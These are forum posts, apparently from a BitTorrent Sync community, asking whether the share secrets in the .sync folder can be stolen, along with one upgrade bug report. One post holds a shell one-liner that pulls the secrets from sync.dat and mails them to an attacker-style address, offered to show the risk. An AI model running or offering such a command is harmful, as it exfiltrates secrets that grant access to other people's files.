[.sync folder security?]

Thanks @JennyElv, this is exactly what I was trying to say/ask. :-)

Thus it's enough just doing this ... nice to know

strings ~/.sync/sync.dat | grep secret32 | sed 's/.*secret32://' | cut -b 1-32 | mail myself@evil.org

[.sync folder security?]

I just wanted to know where the secrets are stored ...

[Destination folder cannot be identified. Would you like to reset ownership?]

I have moved from version 1.130 to 1.132 (linux 64) and:

1. the old folders are no more visible on the web gui
   
2. if I try to re-add them i get "Destination folder cannot be identified. Would you like to reset ownership?"
   

[.sync folder security?]

I think that filtering out the .sync directory is not enough (it's a good step but not enough).

Suppose it is possible to copy sombody else's .sync directory, is it possible to use it to get hold of all his data?

If the secrets are not tied to the host, then any virus/troian could just deliver a copy of it to somebody else and the data would be available to them.

[.sync folder security?]

Hi, I hope I am not asking a FAQ ...

I have not found how the .sync directory is protected from unwanted copying.

Is it possible to steal the .sync directory (with its metadata) and get hold of its' owner shared secrets?

This would allow anybody with direct access to an account to get all the users' files.

I hope this is not the case .... I remember Dropbox having a similar security issue ...